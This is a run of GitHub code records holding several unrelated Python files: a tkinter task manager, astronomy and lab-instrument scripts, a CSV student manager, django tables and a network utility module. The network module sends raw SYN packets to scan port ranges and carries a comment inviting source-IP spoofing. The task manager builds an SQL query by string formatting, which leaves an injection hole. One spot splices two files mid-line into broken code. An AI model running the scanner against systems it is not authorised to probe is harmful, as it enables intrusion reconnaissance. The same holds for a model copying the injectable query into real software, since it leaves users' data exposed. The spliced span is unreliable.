delegated_cursor.execute(f\"SELECT id FROM delegated_tasks WHERE task_or_action = '{task_name}'\")\r\n row = delegated_cursor.fetchone()\r\n row_id = row[0]\r\n delegated_cursor.execute(\"DELETE FROM delegated_tasks WHERE id = ?\", (row_id,))\r\n delegated_conn.commit()\r\n treeview.delete(treeview.selection())\r\n delegated_conn.commit()\r\n delegated_cursor.close()\r\n delegated_conn.close()\r\n\r\n tasks_cursor.execute('CREATE TABLE IF NOT EXISTS tasks (id INTEGER PRIMARY KEY, task_ID TEXT, task_or_action TEXT, keywords TEXT, expected_result TEXT, date TEXT, deadline TEXT, delegate_to TEXT, cooperate_with TEXT)')\r\n task_ID = None\r\n task_or_action = task_description_row.get()\r\n keywords = keywords_row.get()\r\n expected_result = expected_result_row.get()\r\n date = chosen_date\r\n deadline = chosen_deadline\r\n delegate_to = delegate_to_row.get()\r\n cooperate_with = cooperate_with_row.get()\r\n query = \"INSERT INTO tasks (task_ID, task_or_action, keywords, expected_result, date, deadline, delegate_to, cooperate_with) VALUES (?, ?, ?, ?, ?, ?, ?, ?)\"\r\n values = (task_ID, task_or_action, keywords, expected_result, date, deadline, delegate_to, cooperate_with)\r\n tasks_cursor.execute(query, values)\r\n tasks_conn.commit()\r\n messagebox.showinfo(\"Success\", \"Task successfully saved into TASKS!\")\r\n tasks_cursor.close()\r\n tasks_conn.close()\r\n\r\n see_task_win.destroy()\r\n delegated_tasks_list_win.destroy()\r\n except Exception as e:\r\n messagebox.showerror(\"Error\", \"OOPS! 
\" + str(e))\r\n see_task_win.destroy()\r\n else:\r\n pass\r\n\r\n def insert_values():\r\n global chosen_date\r\n global chosen_deadline\r\n\r\n selection = treeview.selection()[0]\r\n task_name = treeview.item(selection, 'values')[1]\r\n\r\n conn = sqlite3.connect('delegated_tasks.db')\r\n cursor = conn.cursor()\r\n\r\n cursor.execute(\"SELECT id FROM delegated_tasks WHERE task_or_action=?\", (task_name,))\r\n row = cursor.fetchone()\r\n row_id = row[0]\r\n \r\n cursor.execute(\"SELECT task_or_action FROM delegated_tasks WHERE id=?\", (row_id,))\r\n result_task_or_action = cursor.fetchone()[0]\r\n task_description_row.insert(0, result_task_or_action)\r\n \r\n cursor.execute(\"SELECT keywords FROM delegated_tasks WHERE id=?\", (row_id,))\r\n result_keywords = cursor.fetchone()[0]\r\n keywords_row.insert(0, result_keywords)\r\n \r\n cursor.execute(\"SELECT expected_result FROM delegated_tasks WHERE id=?\", (row_id,))\r\n result_expected_result = cursor.fetchone()[0]\r\n expected_result_row.insert(0, result_expected_result)\r\n \r\n cursor.execute(\"SELECT date FROM delegated_tasks WHERE id=?\", (row_id,))\r\n chosen_date = cursor.fetchone()[0]\r\n result_date_label = tk.Label(\r\n middle_frame,\r\n text = chosen_date,\r\n font = ('Montserrat', '12'),\r\n background = \"#2F3030\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n result_date_label.place(x = 180, y = 5)\r\n\r\n cursor.execute(\"SELECT deadline FROM delegated_tasks WHERE id=?\", (row_id,))\r\n chosen_deadline = cursor.fetchone()[0]\r\n result_deadline_label = tk.Label(\r\n middle_frame,\r\n text = chosen_deadline,\r\n font = ('Montserrat', '12', 'bold'),\r\n background = \"#970000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n result_deadline_label.place(x = 180, y = 45)\r\n\r\n cursor.execute(\"SELECT delegate_to FROM delegated_tasks WHERE id=?\", (row_id,))\r\n result_delegate_to = cursor.fetchone()[0]\r\n delegate_to_row.insert(0, result_delegate_to)\r\n\r\n cursor.execute(\"SELECT cooperate_with FROM delegated_tasks WHERE id=?\", (row_id,))\r\n result_cooperate_with = cursor.fetchone()[0]\r\n cooperate_with_row.insert(0, result_cooperate_with)\r\n\r\n cursor.close()\r\n conn.close()\r\n\r\n\r\n header_label = tk.Label(\r\n see_task_win,\r\n text = \"TASK VIEW\",\r\n font = ('Montserrat', '15'),\r\n background = \"#212121\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n header_label.place(x = 250, y = 5)\r\n\r\n top_frame = tk.Frame(\r\n see_task_win,\r\n width = 570,\r\n height = 100,\r\n background = \"#2F3030\"\r\n )\r\n top_frame.place(x = 15, y = 40)\r\n\r\n task_description_label = tk.Label(\r\n top_frame,\r\n text = \"TASK OR ACTION\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n task_description_label.place(x = 10, y = 5)\r\n\r\n task_description_row = tk.Entry(\r\n top_frame,\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n width = 56,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n task_description_row.place(x = 150, y = 5)\r\n\r\n keywords_label = tk.Label(\r\n top_frame,\r\n text = \"Keywords\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n keywords_label.place(x = 10, y = 35)\r\n\r\n keywords_row = tk.Entry(\r\n top_frame,\r\n font = (\"Open Sans\", \"10\"),\r\n width = 56,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n keywords_row.place(x = 150, y = 35)\r\n\r\n 
expected_result_label = tk.Label(\r\n top_frame,\r\n text = \"Expected Result\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n expected_result_label.place(x = 10, y = 65)\r\n\r\n expected_result_row = tk.Entry(\r\n top_frame,\r\n font = (\"Open Sans\", \"10\"),\r\n width = 56,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n expected_result_row.place(x = 150, y = 65)\r\n\r\n middle_frame = tk.Frame(\r\n see_task_win,\r\n width = 305,\r\n height = 80,\r\n background = \"#2F3030\"\r\n )\r\n middle_frame.place(x = 15, y = 160)\r\n\r\n date_button = tk.Button(\r\n middle_frame,\r\n text = \"Choose Date\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 16,\r\n command = choose_date,\r\n background = '#464646',\r\n foreground = '#FFFFFF'\r\n )\r\n date_button.place(x = 10, y = 5)\r\n\r\n deadline_button = tk.Button(\r\n middle_frame,\r\n text = \"Choose Deadline\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 16,\r\n command = choose_deadline,\r\n background = '#464646',\r\n foreground = '#FFFFFF'\r\n )\r\n deadline_button.place(x = 10, y = 45)\r\n\r\n\r\n edit_button = tk.Button(\r\n see_task_win,\r\n text = \"EDIT\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 11,\r\n command = edit_task,\r\n background = '#004C01',\r\n foreground = '#FFFFFF'\r\n )\r\n edit_button.place(x = 480, y = 360)\r\n\r\n exit_button = tk.Button(\r\n see_task_win,\r\n text = \"EXIT\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 11,\r\n command = exit_see_task,\r\n background = '#970000',\r\n foreground = '#FFFFFF'\r\n )\r\n exit_button.place(x = 370, y = 360)\r\n\r\n bottom_frame = tk.Frame(\r\n see_task_win,\r\n width = 305,\r\n height = 80,\r\n background = \"#2F3030\"\r\n )\r\n bottom_frame.place(x = 15, y = 265)\r\n\r\n delegate_to_label = tk.Label(\r\n bottom_frame,\r\n text = \"Delegate to\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n delegate_to_label.place(x = 10, y = 5)\r\n\r\n delegate_to_row = tk.Entry(\r\n bottom_frame,\r\n font = (\"Open Sans\", \"10\"),\r\n width = 20,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n delegate_to_row.place(x = 150, y = 5)\r\n\r\n cooperate_with_label = tk.Label(\r\n bottom_frame,\r\n text = \"Cooperate with\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n cooperate_with_label.place(x = 10, y = 35)\r\n\r\n cooperate_with_row = tk.Entry(\r\n bottom_frame,\r\n font = (\"Open Sans\", \"10\"),\r\n width = 20,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n cooperate_with_row.place(x = 150, y = 35)\r\n\r\n see_task_win.protocol(\"WM_DELETE_WINDOW\", exit_see_task)\r\n insert_values()\r\n\r\n\r\n choose_button = tk.Button(\r\n delegated_tasks_list_win,\r\n text = \"CHOOSE TASK\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 11,\r\n command = see_task_in_tasks_list,\r\n background = '#970000',\r\n foreground = '#FFFFFF'\r\n )\r\n choose_button.place(x = 450, y =250)\r\n\r\n\r\n treeview.set_children('', *sorted(treeview.get_children(''), 
key=compare_dates))\r\n\r\n","repo_name":"RealLifeGeek/Time-Management-System","sub_path":"delegated_tasks_list_database.py","file_name":"delegated_tasks_list_database.py","file_ext":"py","file_size_in_byte":18474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32159158408","text":"from pyraf import iraf\nimport os,shutil\nimport numpy as np\n\ndef expand_name(Files):\n if '-' in Files:\n part_Files=Files.replace('-',' ').split()\n N=1-int(part_Files[0][-3:])+int(part_Files[1])\n name_expand=[]\n for i in range(N):\n name_expand.append([])\n name_expand[-1]=part_Files[0][:-3]+'-'+str(int(part_Files[0][-3:])+i).zfill(4)+'.fit'\n else:\n name_expand=Files[:-3]+'-'+str(Files[-3:]).zfill(4)+'.fit';\n N=1\n return N,name_expand\n\ndef expand_inf_file(inf_file):\n N=expand_name(inf_file[-1][0])[0]\n name_expand=expand_name(inf_file[-1][0])[1]\n list_inf_tail=inf_file[-1][1:]\n if N > 1:\n for i in range(N): \n inf_file[-1]=[name_expand[i]]+list_inf_tail\n if i>16) + (s & 0xffff)\n #s = s + (s >> 16)\n #complement and mask to 4 byte short\n s = ~s & 0xffff\n return s\n\n @staticmethod\n def get_ip_from_hostname(interface, adress):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)\n except socket.error as msg:\n print('Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1])\n # sys.exit()\n\n s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)\n return s.gethostbyname_ex(adress)\n\n\n @staticmethod\n def half_port_scan(source_ip, target_ip, start_port, end_port):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)\n except socket.error as msg:\n print('Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1])\n # sys.exit()\n\n for i in range(start_port, end_port):\n # time.sleep(1)\n s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)\n packet = ''\n source_ip = source_ip\n destination_ip = target_ip\n ihl = 5\n version = 4\n tos = 0\n tot_len = 20\n id = 54321 #Id of this packet\n frag_off = 0\n ttl = 44\n protocol = socket.IPPROTO_TCP\n check = 10 # python seems to correctly fill the checksum\n saddr = socket.inet_aton(source_ip) #Spoof the source ip address if you want to\n daddr = socket.inet_aton(destination_ip)\n ihl_version = (version << 4) + ihl\n ip_header = struct.pack('!BBHHHBBH4s4s', ihl_version, tos, tot_len, id, frag_off, ttl, protocol, check, saddr, daddr)\n source = 12345 # source port\n dest = i # destination port\n seq = 0\n ack_seq = 0\n doff = 5 #4 bit field, size of tcp header, 5 * 4 = 20 bytes\n fin = 0\n syn = 1\n rst = 0\n psh = 0\n ack = 0\n urg = 0\n window = socket.htons(5840)\n check = 0\n urg_ptr = 0\n offset_res = (doff << 4) + 0\n tcp_flags = fin + (syn << 1) + (rst << 2) + (psh << 3) + (ack << 4) + (urg << 5)\n tcp_header = struct.pack('!HHLLBBHHH', source, dest, seq, ack_seq, offset_res, tcp_flags, window, check, urg_ptr)\n source_address = socket.inet_aton(source_ip)\n dest_address = socket.inet_aton(destination_ip)\n placeholder = 0\n protocol = socket.IPPROTO_TCP\n tcp_length = len(tcp_header)\n psh = struct.pack('!4s4sBBH', source_address, dest_address, placeholder, protocol, tcp_length)\n psh += tcp_header\n tcp_checksum = NetworkUtils.checksum_tcp(psh)\n tcp_header = struct.pack('!HHLLBBHHH', source, dest, seq, ack_seq, offset_res, tcp_flags, window, tcp_checksum, urg_ptr)\n packet = ip_header + tcp_header\n s.sendto(packet, (destination_ip, 0))\n\n @staticmethod \n def 
get_ip(interface): \n        f = os.popen('ifconfig ' + interface + ' | grep \"inet\\ addr\" | cut -d: -f2 | cut -d\" \" -f1') \n        your_ip = f.read() \n        return your_ip\n\n    @staticmethod\n    def checksum_icmp(source_string):\n        \"\"\"\n        AUTHOR: https://github.com/samuel/python-ping/blob/master/ping.py\n        I'm not too confident that this is right but testing seems\n        to suggest that it gives the same answers as in_cksum in ping.c\n        \"\"\"\n        sum = 0\n        countTo = (len(source_string)/2)*2\n        count = 0\n        while count < countTo:\n            thisVal = ord(source_string[count + 1])*256 + ord(source_string[count])\n            sum = sum + thisVal\n            sum = sum & 0xffffffff # Necessary?\n            count = count + 2\n\n        if countTo < len(source_string):\n            sum = sum + ord(source_string[len(source_string) - 1])\n            sum = sum & 0xffffffff # Necessary?\n\n        sum = (sum >> 16) + (sum & 0xffff)\n        sum = sum + (sum >> 16)\n        answer = ~sum\n        answer = answer & 0xffff\n\n        # Swap bytes. Bugger me if I know why.\n        answer = answer >> 8 | (answer << 8 & 0xff00)\n\n        return answer\n\n    @staticmethod\n    def get_result(probe_name, interface, zielip):\n        if probe_name == \"ICMPProbe\":\n            result = NetworkUtils.receive_icmp(interface, zielip)\n        elif probe_name == \"TCPProbe\":\n            result = NetworkUtils.receive_tcp(interface, zielip)\n        else:\n            result = [\"Something went wrong\", probe_name]\n\n        return result\n","repo_name":"eliasarnold/internetandsecurityproject","sub_path":"src/NetworkUtils.py","file_name":"NetworkUtils.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14206044613","text":"import csv\r\n\r\ndef add_student():\r\n    with open('students.csv', 'a', newline='') as file:\r\n        writer = csv.writer(file)\r\n        name = input(\"Enter the student's name: \")\r\n        id_number = input(\"Enter the student's ID number: \")\r\n        age = input(\"Enter the student's age: \")\r\n        grade = input(\"Enter the student's grade: \")\r\n        course_code = input(\"Enter the course code: \")\r\n        writer.writerow([name, id_number, age, grade, course_code])\r\n        print(\"Student added successfully\")\r\n\r\ndef edit_student():\r\n    students = []\r\n    with open('students.csv', 'r') as file:\r\n        reader = csv.reader(file)\r\n        for row in reader:\r\n            students.append(row)\r\n    name = input(\"Enter the name of the student you want to edit: \")\r\n    for student in students:\r\n        if student[0] == name:\r\n            student[1] = input(\"Enter the new ID number: \")\r\n            student[2] = input(\"Enter the new age: \")\r\n            student[3] = input(\"Enter the new grade: \")\r\n            student[4] = input(\"Enter the new course code: \")\r\n            with open('students.csv', 'w', newline='') as file:\r\n                writer = csv.writer(file)\r\n                writer.writerows(students)\r\n            print(\"Student edited successfully\")\r\n            return\r\n    print(\"Student not found\")\r\n\r\ndef delete_student():\r\n    students = []\r\n    with open('students.csv', 'r') as file:\r\n        reader = csv.reader(file)\r\n        for row in reader:\r\n            students.append(row)\r\n    name = input(\"Enter the name of the student you want to delete: \")\r\n    for student in students:\r\n        if student[0] == name:\r\n            students.remove(student)\r\n            with open('students.csv', 'w', newline='') as file:\r\n                writer = csv.writer(file)\r\n                writer.writerows(students)\r\n            print(\"Student deleted successfully\")\r\n            return\r\n    print(\"Student not found\")\r\n\r\ndef display_students():\r\n    with open('students.csv', 'r') as file:\r\n        reader = csv.reader(file)\r\n        for row in reader:\r\n            print(*row, sep='\\t')\r\n\r\n# Course-related functions\r\ndef add_course():\r\n    with open('courses.csv', 'a', newline='') as file:\r\n        writer = csv.writer(file)\r\n        course_name = input(\"Enter the name of the course: \")\r\n        course_code = input(\"Enter the course code: \")\r\n        course_instructor = input(\"Enter the name of the instructor: \")\r\n        writer.writerow([course_name, 
course_code, course_instructor])\r\n print(\"Course added successfully\")\r\n\r\ndef edit_course():\r\n courses = []\r\n with open('courses.csv', 'r') as file:\r\n reader = csv.reader(file)\r\n for row in reader:\r\n courses.append(row)\r\n course_name = input(\"Enter the name of the course you want to edit: \")\r\n for course in courses:\r\n if course[0] == course_name:\r\n course[1] = input(\"Enter the new course code: \")\r\n course[2] = input(\"Enter the new instructor name: \")\r\n with open('courses.csv', 'w', newline='') as file:\r\n writer = csv.writer(file)\r\n writer.writerows(courses)\r\n print(\"Course edited successfully\")\r\n return\r\n print(\"Course not found\")\r\n\r\ndef delete_course():\r\n courses = []\r\n with open('courses.csv', 'r') as file:\r\n reader = csv.reader(file)\r\n for row in reader:\r\n courses.append(row)\r\n course_name = input(\"Enter the name of the course you want to delete: \")\r\n for course in courses:\r\n if course[0] == course_name:\r\n courses.remove(course)\r\n with open('courses.csv', 'w', newline='') as file:\r\n writer = csv.writer(file)\r\n writer.writerows(courses)\r\n print(\"Course deleted successfully\")\r\n return\r\n print(\"Course not found\")\r\n\r\ndef display_courses():\r\n with open('courses.csv', 'r') as file:\r\n reader = csv.reader(file)\r\n for row in reader:\r\n print(row[0], row[1], row[2], sep='\\t')\r\n\r\nwhile True:\r\n print(\"1. Add student\")\r\n print(\"2. Edit student\")\r\n print(\"3. Delete student\")\r\n print(\"4. Display students\")\r\n print(\"5. Add course\")\r\n print(\"6. Edit course\")\r\n print(\"7. Delete course\")\r\n print(\"8. Display courses\")\r\n print(\"9. Exit\")\r\n\r\n choice = input(\"Enter your choice: \")\r\n\r\n if choice == '1':\r\n add_student()\r\n elif choice == '2':\r\n edit_student()\r\n elif choice == '3':\r\n delete_student()\r\n elif choice == '4':\r\n display_students()\r\n elif choice == '5':\r\n add_course()\r\n elif choice == '6':\r\n edit_course()\r\n elif choice == '7':\r\n delete_course()\r\n elif choice == '8':\r\n display_courses()\r\n elif choice == '9':\r\n break\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"edenDorato27/CCC151-SSIS","sub_path":"SSIS_CSV.py","file_name":"SSIS_CSV.py","file_ext":"py","file_size_in_byte":4889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37237340518","text":"## @package Config.BaseConfig\r\n# Base class for all worlds.\r\n\r\nfrom Enviroment.Affordances import *\r\nfrom Enviroment.Objects import *\r\nfrom Agents.Intentions import Intentions, Intention\r\nfrom Agents.Processes import Processes, Process\r\nfrom Agents.Scenarios import Scenario\r\n\r\n## Base class for all worlds, implements common tasks.\r\nclass BaseConfig:\r\n def __init__(self):\r\n self.intentions = Intentions()\r\n self.processes = Processes()\r\n self.scenario = Scenario()\r\n \r\n ## Populates self.intentions and self.processes. 
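The student/course helpers in the SSIS_CSV record above address rows positionally (student[0], student[1], ...), which breaks silently if the column order ever changes. A hedged alternative using csv.DictReader; the field names below are my own labels, since the original students.csv carries no header row, so this is a variation rather than a drop-in replacement:

```python
import csv

FIELDS = ["name", "id_number", "age", "grade", "course_code"]  # assumed column order

def load_students(path="students.csv"):
    # Rows come back as dicts keyed by field name instead of position.
    with open(path, newline="") as f:
        return list(csv.DictReader(f, fieldnames=FIELDS))

def save_students(students, path="students.csv"):
    with open(path, "w", newline="") as f:
        csv.DictWriter(f, fieldnames=FIELDS).writerows(students)

def delete_student_by_name(name, path="students.csv"):
    # Filtering a copy is simpler (and safer) than removing items mid-iteration.
    save_students([s for s in load_students(path) if s["name"] != name], path)
```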
\r\n def prepareProcessIntentionsItems(self):\r\n P_Eat = Process(\"Eating\", [], [Eatability], [Eatability], [], 1800)\r\n self.processes.AddProcess(P_Eat)\r\n I_Eat = Intention(\"Eat\", [P_Eat])\r\n self.intentions.AddIntention(I_Eat)\r\n \r\n P_Drink = Process(\"Drinking\", [], [Drinkability], [Drinkability], [], 60)\r\n self.processes.AddProcess(P_Drink)\r\n I_Drink = Intention(\"Drink\", [P_Drink])\r\n self.intentions.AddIntention(I_Drink)\r\n \r\n P_Smoke = Process(\"Smoking\", [], [Smokeability], [], [], 300)\r\n self.processes.AddProcess(P_Smoke)\r\n I_Smoke = Intention(\"Smoke\", [P_Smoke])\r\n self.intentions.AddIntention(I_Smoke)\r\n \r\n P_Read = Process(\"Reading\", [], [Readability], [], [], 4000)\r\n self.processes.AddProcess(P_Read)\r\n I_Read = Intention(\"Read\", [P_Read])\r\n self.intentions.AddIntention(I_Read)\r\n \r\n P_Wash = Process(\"Washing\", [], [Washability], [Wetability], [], 600)\r\n self.processes.AddProcess(P_Wash)\r\n I_Wash = Intention(\"Wash\", [P_Wash])\r\n self.intentions.AddIntention(I_Wash)\r\n \r\n P_Heat = Process(\"Heating\", [], [Fireability], [Fireability], [], 1200)\r\n self.processes.AddProcess(P_Heat)\r\n I_Heat = Intention(\"Heat\", [P_Heat])\r\n self.intentions.AddIntention(I_Heat)\r\n \r\n P_Watch = Process(\"Watching\", [], [Watchability], [], [], 4000)\r\n self.processes.AddProcess(P_Watch)\r\n I_Watch = Intention(\"Watch\", [P_Watch])\r\n self.intentions.AddIntention(I_Watch)\r\n \r\n P_Play = Process(\"Playing\", [], [Playability], [], [], 900)\r\n self.processes.AddProcess(P_Play)\r\n I_Play = Intention(\"Play\", [P_Play])\r\n self.intentions.AddIntention(I_Play)\r\n \r\n P_Sit = Process(\"Sitting\", [], [Sitability], [], [], 1200)\r\n self.processes.AddProcess(P_Sit)\r\n I_Sit = Intention(\"Sit\", [P_Sit])\r\n self.intentions.AddIntention(I_Sit)\r\n \r\n P_Repair = Process(\"Repairing\", [], [Repairability], [], [], 600)\r\n self.processes.AddProcess(P_Repair)\r\n I_Repair = Intention(\"Repair\", [P_Repair])\r\n self.intentions.AddIntention(I_Repair)\r\n \r\n P_Nail = Process(\"Nailing\", [], [Nailability], [Nailability], [], 120)\r\n self.processes.AddProcess(P_Nail)\r\n I_Nail = Intention(\"Nail\", [P_Nail])\r\n self.intentions.AddIntention(I_Nail)\r\n \r\n ## Creates list of high-level intentioins used for pre-generting agent's scenrio. Override in subclasses.\r\n def prepareProcessIntentions(self): \r\n self.intentions.AddHighLevelIntention(\"Eat\")\r\n self.intentions.AddHighLevelIntention(\"Drink\")\r\n self.intentions.AddHighLevelIntention(\"Smoke\")\r\n self.intentions.AddHighLevelIntention(\"Read\")\r\n self.intentions.AddHighLevelIntention(\"Wash\")\r\n self.intentions.AddHighLevelIntention(\"Heat\")\r\n self.intentions.AddHighLevelIntention(\"Watch\")\r\n self.intentions.AddHighLevelIntention(\"Play\")\r\n self.intentions.AddHighLevelIntention(\"Sit\")\r\n self.intentions.AddHighLevelIntention(\"Repair\")\r\n self.intentions.AddHighLevelIntention(\"Nail\")\r\n \r\n ## Pre-generates agent's scenario.\r\n def prepareScenario(self): \r\n self.scenario = Scenario()\r\n self.scenario.Generate(self.intentions)\r\n \r\n ## Sets agents intentions, processes and scenario to ActionSelector. 
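Every activity registered in prepareProcessIntentionsItems follows one pattern: construct a Process, wrap it in a single-process Intention, and register both. Extending the world with another activity is therefore a four-line affair; the sketch below invents a "Sleeping" activity purely for illustration (the reuse of Sitability and the 28800-second duration are my assumptions, and a matching AddHighLevelIntention("Sleep") call would go in prepareProcessIntentions):

```python
# Hypothetical extra activity, mirroring the registrations above.
P_Sleep = Process("Sleeping", [], [Sitability], [], [], 28800)
self.processes.AddProcess(P_Sleep)
I_Sleep = Intention("Sleep", [P_Sleep])
self.intentions.AddIntention(I_Sleep)
```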
Called from ActionSelector.\r\n def GetAgentIntentions(self, actionSelector):\r\n self.intentions = Intentions()\r\n self.processes = Processes()\r\n self.scenario = Scenario()\r\n \r\n self.prepareProcessIntentionsItems()\r\n self.prepareProcessIntentions()\r\n self.prepareScenario()\r\n \r\n actionSelector.processes = self.processes\r\n actionSelector.intentions = self.intentions\r\n actionSelector.scenario = self.scenario\r\n \r\n ## Creates world. Override in subclasses. \r\n def prepareMap(self, map):\r\n pass\r\n \r\n ## Creates world's future history. Override in subclasses.\r\n def GetWorldsEvents(self):\r\n return []\r\n\r\n ## Creates world.\r\n def SetUpMap(self, map):\r\n self.prepareMap(map)\r\n \r\n","repo_name":"jakubkotrla/spacemap","sub_path":"src/Config/BaseConfig.py","file_name":"BaseConfig.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17707550363","text":"import django_tables2 as tables\nfrom . import models\n\n\n\n\nclass ClientTable(tables.Table):\n\n class Meta:\n model = models.Client\n template_name = \"django_tables2/bootstrap.html\"\n fields = (\"id\",\"nom\",\"prenom\",\"adresse\",\"tel\",\"sexe\",\"chiffre_affaire\",\"actions\")\n\nclass FactureTable(tables.Table):\n class Meta:\n model = models.Facture\n template_name = \"django_tables2/bootstrap.html\"\n fields = ('id','date','total')\n\n\nclass FournisseurTable(tables.Table):\n\n class Meta:\n model = models.Fournisseur\n template_name = \"django_tables2/bootstrap.html\"\n fields = ('id','nom','actions')\n \nclass FournisseurWithChiffreAffaireTable(tables.Table):\n class Meta:\n model = models.Fournisseur\n template_name = \"django_tables2/bootstrap.html\"\n fields = ('nom','chiffre_affaire')\n\nclass ClientWithChiffreAffaireTable(tables.Table):\n class Meta:\n model = models.Client\n template_name = \"django_tables2/bootstrap.html\"\n fields = ('nom','prenom','chiffre_affaire')\n\n","repo_name":"LydiaBenaida/Bill_project","sub_path":"billApp/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30581540656","text":"def solution(heights):\n answer = []\n sign = 0\n for i in range(len(heights)-1,-1,-1) :\n sw = 0\n for j in range(i,-1,-1) :\n if heights[j] > heights[i] :\n answer.insert(0,j+1)\n sw = 1\n break\n if sw == 0 :\n answer.insert(0,0)\n \n print(answer)\n return answer\n\nsolution([6,9,5,7,4]) #[0,0,2,2,4]\nsolution([3,9,9,3,5,7,2]) #[0,0,0,3,3,3,6]\nsolution([1,5,3,6,7,6,5]) #[0,0,2,0,0,5,6]","repo_name":"Keunyoung-Jung/Algrithm","sub_path":"top_signal.py","file_name":"top_signal.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13380241508","text":"from common import csv_utils, uuid_generator\nimport os\nfrom tqdm import tqdm\n\nfrom db import db_access\nfrom entities.needs_and_initiatives import Organization\n\n\ndef _create_organization_entity(data_dict: dict):\n try:\n year_of_founding = int(data_dict['שנת הקמה'])\n except ValueError:\n year_of_founding = -1\n data = Organization(\n id=str(uuid_generator.generate_uuid()),\n timestamp=data_dict['Timestamp'],\n org_name=data_dict['שם הארגון'],\n contact_name=data_dict['איש קשר'],\n phone_number=data_dict['טלפון'],\n city=data_dict['עיר'],\n address=data_dict['כתובת'],\n email=data_dict['אימייל'],\n 
donation_type=data_dict['סוג תרומה'],\n org_size=data_dict['גודל הארגון'],\n year_of_founding=year_of_founding,\n role=data_dict['תפקיד'],\n org_logo=data_dict['לוגו של הארגון'],\n org_description=data_dict['כמה מילים על הארגון'],\n resource_needs=data_dict['משאבים נדרשים להמשך פעילות'],\n additional_info=data_dict['פרטים נוספים'],\n our_contact_name=data_dict['שם המתנדב מטעמנו (מתחברים)'],\n notes_for_donation=data_dict['הערות לתרומה'],\n our_contact_phone_number=data_dict['טלפון המתנדב מטעמנו (מתחברים)'],\n ask_or_give=data_dict['מבקשים/מציעים תרומה'],\n )\n return data\n\n\ndef migrate(csv_file_path: str):\n rows = csv_utils.load_csv(csv_file_path=csv_file_path)\n for row in tqdm(rows):\n organization_entity = _create_organization_entity(row)\n for donation_type in organization_entity.donation_type.split(\",\"):\n donation_type = donation_type.strip()\n\n db_access.insert_organzation(entity=organization_entity)\n\n\n\nif __name__ == '__main__':\n file_path = os.path.expanduser('~/Downloads/mithabrim_sheet.csv')\n migrate(file_path)","repo_name":"yonatanmaor/mithabrim","sub_path":"src/migrations/migrate_needs_and_initiatives_sheet_to_db.py","file_name":"migrate_needs_and_initiatives_sheet_to_db.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"he","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41100707693","text":"from tkinter import *\r\nfrom matplotlib.figure import Figure \r\nfrom matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg, \r\nNavigationToolbar2Tk) \r\nimport random\r\nimport math\r\nimport tkinter.font as font\r\nimport pyvisa\r\nimport time\r\nfrom matplotlib import ticker\r\nimport numpy as np\r\n\r\nrec = False\r\npltSec = False\r\nfilename = \"5_11_dummy6.txt\"\r\nIset = 1.0\r\nbooli = True\r\n\r\ndef openDev(rm):\r\n srs = rm.open_resource('GPIB0::10::INSTR')\r\n print(srs.query('*IDN?'))\r\n dsp = rm.open_resource('GPIB0::12::INSTR')\r\n print(dsp.query('*IDN?'))\r\n therm = rm.open_resource('GPIB0::13::INSTR')\r\n print(therm.query('*IDN?'))\r\n isou = rm.open_resource('GPIB0::25::INSTR')\r\n isou.read_termination = '\\r'\r\n return srs, dsp, therm, isou\r\n\r\ndef getData(srs, dsp, therm, isou):\r\n srs.clear()\r\n srsR = float(srs.query('OUTP ? 3'))\r\n srsT = float(srs.query('OUTP ? 
